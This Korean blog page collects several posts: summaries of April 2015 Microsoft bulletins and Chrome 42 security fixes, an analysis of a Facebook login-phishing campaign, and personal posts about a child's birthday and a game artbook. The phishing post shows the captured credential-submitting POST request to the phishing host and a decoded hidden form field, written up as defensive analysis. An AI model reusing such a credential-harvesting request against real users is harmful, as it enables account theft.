※ 최신 버전이 아닌 상태에서 해당 제품 사용시 "공개된 취약점을 이용한 신종 악성코드" 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 아래의 해결책을 참고해서 최신 버전으로 업데이트 후 사용바랍니다.

※ 아래의 링크를 클릭하면 해당 취약점에 대한 정보를 볼 수 있다.

1. MS15-032 (긴급) : Internet Explorer용 누적 보안 업데이트(3038314)

이 보안 업데이트는 Internet Explorer의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 Internet Explorer를 사용하여 특수 제작된 웹 페이지를 볼 경우 원격 코드 실행을 허용할 수 있습니다. 이 취약성 악용에 성공한 공격자는 현재 사용자와 동일한 권한을 얻을 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Internet Explorer의 여러 메모리 손상 취약성:

  CVE-2015-1652,CVE-2015-1657, CVE-2015-1659, CVE-2015-1660, CVE-2015-1662, CVE-2015-1665, CVE-2015-1666, CVE-2015-1667, CVE-2015-1668

- Internet Explorer ASLR 우회 취약성(CVE-2015-1661)


2. MS15-033 (긴급) : Microsoft Office의 취약성으로 인한 원격 코드 실행 문제(3048019)

이 보안 업데이트는 Microsoft Office의 취약성을 해결합니다. 이 중에서 가장 심각한 취약성은 사용자가 특수 제작된 Microsoft Office 파일을 열 경우 원격 코드 실행을 허용할 수 있습니다. 이러한 취약성 악용에 성공한 공격자는 현재 사용자의 컨텍스트에서 임의 코드를 실행할 수 있습니다. 시스템에 대한 사용자 권한이 적게 구성된 계정의 고객은 관리자 권한으로 작업하는 고객에 비해 영향을 적게 받습니다.

- Microsoft Office 메모리 손상 취약성(CVE-2015-1641)

- 여러 Microsoft Office 구성 요소 해제 후 사용 취약성:

  CVE-2015-1650, CVE-2015-1649, CVE-2015-1651

- Microsoft Outlook App for Mac XSS 취약성(CVE-2015-1639)


3. MS15-034 (긴급) : HTTP.sys의 취약성으로 인한 원격 코드 실행 문제(3042553)

이 보안 업데이트는 Microsoft Windows에서 발견된 취약성을 해결합니다. 공격자가 영향 받는 Windows 시스템에 특수 제작된 HTTP 요청을 보낼 경우 이 취약성으로 인해 원격 코드 실행이 허용될 수 있습니다.

- HTTP.sys 원격 코드 실행 취약성(CVE-2015-1635)


4. MS15-035 (긴급) : Microsoft 그래픽 구성 요소의 취약성으로 인한 원격 코드 실행 문제(3046306)

이 보안 업데이트는 Microsoft Windows에서 발견된 취약성을 해결합니다. 공격자가 사용자에게 특수 제작된 웹 사이트로 이동하거나, 특수 제작된 파일을 열거나, 특수 제작된 EMF(확장 메타파일) 이미지 파일이 포함된 작업 디렉터리로 이동하도록 유도할 경우 이 취약성으로 인해 원격 코드 실행이 허용 될 수 있습니다. 그러나 어떠한 경우에도 공격자는 강제로 사용자가 이러한 작업을 수행하도록 만들 수 없습니다. 공격자는 일반적으로 전자 메일이나 인스턴트 메신저 메시지에서 유인물을 이용하여 이러한 작업을 수행하도록 사용자를 유도해야 합니다.

- EMF 처리 원격 코드 실행 취약성(CVE-2015-1645)


5. MS15-036 (중요) : Microsoft SharePoint Server의 취약성으로 인한 권한 상승 문제(3052044)

이 보안 업데이트는 Microsoft Office 서버 및 생산성 소프트웨어의 취약성을 해결합니다. 이 취약성으로 인해 공격자가 영향받은 SharePoint 서버에 특수 제작된 요청을 보내는 경우 권한 상승이 허용될 수 있습니다. 이 취약성 악용에 성공한 공격자는 읽도록 허가되지 않은 콘텐츠를 읽고, 희생자의 ID를 사용해서 희생자 대신 SharePoint 사이트에서 사용 권한 변경 및 콘텐츠 삭제와 같은 작업을 수행하고, 희생자의 브라우저에 악성 콘텐츠를 삽입할 수 있습니다.

- 여러 SharePoint XSS 취약성:

  CVE-2015-1640, CVE-2015-1653


6. MS15-037 (중요) : Windows 작업 스케줄러의 취약성으로 인한 권한 상승 문제(3046269)

이 보안 업데이트는 Microsoft Windows에서 발견된 취약성을 해결합니다. 이 취약성 악용에 성공한 공격자는 알려진 잘못된 작업을 활용하여 작업 스케줄러가 특수 제작된 응용 프로그램을 시스템 계정의 컨텍스트에서 실행되도록 할 수 있습니다. 이렇게 되면 공격자가 프로그램을 설치할 수 있을 뿐 아니 라 데이터를 보거나 변경하거나 삭제하거나, 모든 사용자 권한이 있는 새 계정을 만들 수도 있습니다.

- 작업 스케줄러 권한 상승 취약성(CVE-2015-0098)


7. MS15-038 (중요) : Microsoft Windows의 취약성으로 인한 권한 상승 문제(3049576)

이 보안 업데이트는 Microsoft Windows의 취약성을 해결합니다. 공격자가 시스템에 로그온하고 특수 제작된 응용 프로그램을 실행할 경우 이 취약성으로 인해 권한 상승이 허용될 수 있습니다. 이 취약성을 악용하려면 공격자가 먼저 시스템에 로그온 해야 합니다.

- NtCreateTransactionManager 유형 혼동 취약성(CVE-2015-1643)

- Windows MS-DOS 장치 이름 취약성(CVE-2015-1644)


8. MS15-039 (중요) : XML Core Services의 취약성으로 인한 보안 기능 우회 문제(3046482)

이 보안 업데이트는 Microsoft Windows에서 발견된 취약성을 해결합니다. 이 취약성으로 인해 사용자가 특수 제작된 파일을 여는 경우 보안 기능 우회가 허용될 수 있습니다. 그러나 어떠한 경우에도 공격자는 강제로 사용자가 특수 제작된 파일을 열도록 만들 수 없습니다. 공격자는 일반적으로 전자 메일이나 인스턴트 메신저 메시지에서 유인물을 이용하여 이 파일을 열도록 사용자를 유도해야 합니다.

- MSXML3 동일 원본 정책 SFB 취약성(CVE-2015-1646)


9. MS15-040 (중요) : Active Directory Federation Services의 취약성으로 인한 정보 유출 문제(3045711)

이 보안 업데이트는 AD FS(Active Directory Federation Services)의 취약성을 해결합니다. 사용자가 응용 프로그램에서 로그 오프 한 후 브라우저를 열어두고, 공격자가 사용자가 로그 오프 한 직후 이 브라우저에서 해당 응용 프로그램을 다시 여는 경우 이 취약성으로 인해 정보가 유출될 수 있습니다.

- Windows Server 2012 R2에 설치된 경우 AD FS 3.0


10. MS15-041 (중요) : .NET Framework의 취약성으로 인한 정보 유출 문제(3048010)

이 보안 업데이트는 Microsoft .NET Framework의 취약성을 해결합니다. 이 취약성으로 인해 공격자가 사용자 지정 오류 메시지가 사용되지 않는 영향받는 서버에 특수 제작된 웹 요청을 보내는 경우 정보가 유출될 수 있습니다. 이 취약성 악용에 성공한 공격자는 중요한 정보를 노출할 수 있는 웹 구성 파일의 일부를 볼 수 있습니다.

- ASP.NET 정보 유출 취약성(CVE-2015-1648)


11. MS15-042 (중요) : Windows Hyper-V의 취약성으로 인한 서비스 거부 문제(3047234)

이 보안 업데이트는 Microsoft Windows에서 발견된 취약성을 해결합니다. 이 취약성으로 인해 인증된 공격자가 특수 제작된 응용 프로그램을 VM(가상 컴퓨터) 세션에서 실행하는 경우 서비스 거부가 허용될 수 있습니다. 서비스 거부는 공격자가 Hyper-V 호스트에서 실행되는 다른 VM에서 코드를 실행하거나 사용자 권한을 상승시키도록 허용하지 않지만, 호스트의 다른 VM을 Virtual Machine Manager에서 관리 가능하지 않게 만들 수 있습니다.

- Windows Hyper-V DoS 취약성(CVE-2015-1647)





블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 42.0.2311.90 정식 버전으로 업데이트 되었습니다.


이번 42버전에서는 보안취약점도 보안 되었고, 안정화와 새로운 앱이 추가 되었습니다.

- A number of new apps, extension and Web Platform APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)

- The answer to life, the universe and everything (42퍼즐에 대한 구글 이스터에그??)


※ The answer to life, the universe and everything 이 내용은 정확히 어떤걸 말하는지 잘 모르겠다.

   "은하수를 여행하는 히치하이커를 위한 안내서" 에 나오는 퍼즐이라는데 이해를 잘 못하겠음 ㅠㅠ

   아시는 분은 댓글로 설명 좀 ㅋ 이게 왜 구글 크롬 업데이트 내용에 있는건지!!!



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 13건의 High 등급,  6건의 Medium 등급 등 총 51건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 42.0.2311.90 패치 내용

■ High CVE-2015-1235 : Cross-origin-bypass in HTML parser

■ Medium CVE-2015-1236 : Cross-origin-bypass in Blink

■ High CVE-2015-1237 : Use-after-free in IPC

■ High CVE-2015-1238 : Out-of-bounds write in Skia

■ Medium CVE-2015-1240 : Out-of-bounds read in WebGL

■ Medium CVE-2015-1241: Tap-Jacking

■ High CVE-2015-1242 : Type confusion in V8

■ Medium CVE-2015-1244 : HSTS bypass in WebSockets

■ Medium CVE-2015-1245 : Use-after-free in PDFium

■ Medium CVE-2015-1246 : Out-of-bounds read in Blink

■ Medium CVE-2015-1247 : Scheme issues in OpenSearch

■ Medium CVE-2015-1248 : SafeBrowsing bypass


- 내부 보안 취약점 패치 내용

■ CVE-2015-1249 : Various fixes from internal audits, fuzzing and other initiatives.

                      Multiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14).



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





최근 페이스북에서 계정을 탈취 당한 사용자의 아이디를 이용하여 "야한 동영상(야동 또는 성정적인 동영상)" 사진을

업로드 하고, 해당 피드에 친구리스트를 모두 초대하여 추가적인 로그인 습득을 하기 위한 공격이 유행하고 있다.


이스트소프트의 알약 블로그에 해당 내용이 더 자세하게 나와있으니 참고~!!


알약 블로그 이외에도 Ec0nomist's Lab, viruslab 블로그에 가면 실제로는 더 많은 사례들을 볼 수 있다.


이 방식이 새로운 방식은 아니지만 최근에는 국내 사용자를 타겟으로 빈번하게 발생하고 있는 듯 하다.

(국내 사용자를 타겟으로 한다고 이야기하는 건 개인적으로 국내 동영상을 많이 사용하고 있기 때문이지, 공식적인 내용은 아니다)


이전에는 나한테 직접 오는 경우가 없어서 포스팅을 못하고 있었는데, 운좋게 어제 나에게도 행운이 찾아왔다!!


그럼 어떤식으로 이번 피싱사이트로 유도를 하는지 알아보자.


최초 유포는 위에서 말했듯이 계정을 탈취 당한 사용자가 "야한 동영상(야동 또는 성정적인 동영상)"을 업로드하고,

자신의 친구를 모두 초대시킨다.


이때 초대 된 사용자가 클릭하여 동영상을 볼 수 있게 링크를 걸어둔다.

(나도 초대가 되어 해당 피드를 확인 할 수 있었다 ㅋㅋㅋ)


※ 정말 아쉽게도 최초 유포 사진을 찍지 못함;;;

스크린샷을 찍기 위해 남겨두었었는데 실수로 F5를 누르는 바람에 ㅡ.ㅡ;;;;;;;


암튼, 내가 확인 한 피싱 피드는 아래와 같이 작성되어 있었다.




사진 상단의 문구인 ">.< OMG ... SEXY GIRL KOREA !  Application Video" 에서 Application Video 를 클릭하면 

Facebook 로그인 피싱 사이트로 이동된다.



아래는 정상적인 페이스북 로그인 사이트이다.

전혀 다른게 없다;;



Facebook 로그인 피싱 사이트의 로그인 창에 이메일(전화번호)과 암호를 입력하면 특정 서버에 전송이 되고, 

습득한 계정에 로그인해서 가입되어 있던 그룹에 추가적인 전파를 시도 할 것으로 보인다.


User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: malai-appsnew.com

Content-Length: 243

Connection: Keep-Alive

Cache-Control: no-cache


lsd=AVpTtEad&display=&enable_profile_selector=&legacy_return=1&profile_selector_ids=&trynum=1&timezone=&lgndim=&lgnrnd=022441_u34E&lgnjs=n&email=guest@guest.com&pass=123456789&persistent=1&default_persistent=1&login=%EB%A1%9C%EA%B7%B8%EC%9D%B8



실제로 로그인창에 모든 내용을 기록하면 유투브(YouTube)의 영상페이지로 이동 된다.

(영상은 윙크티비 BJ 비비앙님 ㄷㄷㄷㄷ)



이 과정에서 로그인 클릭 시 유투브 사이트로 이동하는 방식을 좀 알아보려고 했다.


해당 사이트를 분석하다 보니 login.php 내부 로그인폼에 hidden 타입의 input 태그가 입력되어 있었다.


<input type="hidden" name="qsstamp" value="W1tbMjMsMzIsNDksOTAsOTMsOTYsMTA3LDExMiwxMjIsMTM1LDIwNCwyNDEsMjQzLDI0OCwyNjgsMjk0LDMxMiwzMTgsMzIyLDM0MiwzNTQsMzU5LDM2NiwzNzAsMzc5LDM4NywzOTYsNDA4LDQxMSw0MTIsNDE5LDQyNiw0MzMsNTA2LDUyMCw1MjIsNTQxLDU2Miw1NzMsNjAzLDY1OCw2ODNdXSwiQVprQ3FLeUhQenowWEdsQTJTblp1ZFZEV1lOREwxSmFDU1lUa05fZXJYSTYtWGdaZ05SZHBmREdZQlllLWZBdjhyTTMtR1dhbEJnZkRnS2VVaG1MblRpbjlGeW9uWmxibXcyd2hqNFNxNFp3b01qM0VNUnA2ak9ZbndVNDN5LWNrOHNCd29zRUltUW0yR093WFAzUGpnMkJjN3p1Vm5qZV8zaWtqYWU5YzFQZHUzay1uMHQwSWF4ZFhjZTM4bV9ZUEZuWVo1UkU4bHdORXBLUUdBNHdvcEc5Il0=">


value 값에는 Base64로 보이는 데이터가 있어서 디코딩 해봤더니 아래와 같이 복호화가 되었다.

[[[23,32,49,90,93,96,107,112,122,135,204,241,243,248,268,294,312,318,322,342,354,359,366,370,379,387,396,408,411,412,419,426,433,506,520,522,541,562,573,603,658,683]],"AZkCqKyHPzz0XGlA2SnZudVDWYNDL1JaCSYTkN_erXI6-XgZgNRdpfDGYBYe-fAv8rM3-GWalBgfDgKeUhmLnTin9FyonZlbmw2whj4Sq4ZwoMj3EMRp6jOYnwU43y-ck8sBwosEImQm2GOwXP3Pjg2Bc7zuVnje_3ikjae9c1Pdu3k-n0t0IaxdXce38m_YPFnYZ5RE8lwNEpKQGA4wopG9"]


근데....아무리 봐도 이게 어떻게 hxxps://www.youtube.com/watch?v=Q9cVmRrdKAI 이 사이트로 이동을 하는건지

도통 모르겠다;;


포스팅을 보시는 분들 중에서 혹시 아시는분은 댓글로 설명 좀^^

(php 서버라서 내부에서 뭔 짓을 하는지 모르겠음 ㅠㅠ)


계속 이어서....

사용자가 클릭하여 이동 한 Facebook 로그인 피싱 사이트는 실제 미국 쪽에 위치 하는 것을 알 수 있다.



※ 추가 내용

다른 내용이 있는지 구글링 중 다른 이미지도 있어서 그냥 추가해 본다 ㅎㅎㅎ


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



우리 김주원이 태어난 게 엊그제 같은데~ 벌써 첫번째 돌잔치를 준비하고 있다 ㅎㅎㅎ

정말 시간이 어마어마 빠르게 지나간다~!!


"초보아빠 이야기" 카테고리에는 "탄생" -> "돌잔치"  ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ

1년간의 행보가 하나도 없다 ㅠㅠ 이를 어쩜 좋나;;;


암튼, 많은 분들이 오시라고 포스팅 하는 건 아니고^^;;

그냥 개인적인 기록이라 생각해주세요~!!

(그래서 개인정보는 최대한 가렸음)


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




이스트소프트의 스타일리쉬 액션 MMORPG "카발 온라인" 이 벌써 10주년이나 되었다니 놀랍네요.


2005년부터 지금까지 많은 사랑을 받아서 현재까지 많은 업데이트를 통해 유저들을 즐겁게 해주었기 때문에

여기까지 올 수 있었을 것으로 생각합니다^^


암튼 이번 10주년을 기념하여 그동안의 역사를 한눈에 볼 수 있는 아트북을 선보였습니다.


개발 초기부터 최근에 공개된 자료까지 네바레스 대륙과 던전의 각종 일러스트와 스케치, 다채로운 컨셉아트를 풀 컬러 한 권에 담은

"카발 온라인 아트북(THE ART OF CABAL)" 은 국내 독자뿐만 아니라 전 세계의 독자를 위해 영문 수록되어 있습니다.



■ 자세한 사항은 아래의 사이트에서 확인하실 수 있습니다.

- 카발 온라인 홈페이지 : http://cabal.co.kr/main


- 카발 온라인 아트북 이벤트 페이지 : http://event.cabal.co.kr/view/anniversary10th/artbook


- 카발 온라인 아트북 판매처 홈페이지 : http://www.aladin.co.kr/shop/wproduct.aspx?ISBN=8959523356



간략하게 아트북 내용을 살펴볼까요? 여러가지 그림들이 원화로 되어 있네요^^























카발 온라인을 했었던 유저로써 살까 말까 고민했네요.



하지만, 샀습니다 ㅋㅋㅋㅋㅋㅋㅋㅋㅋㅋ


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.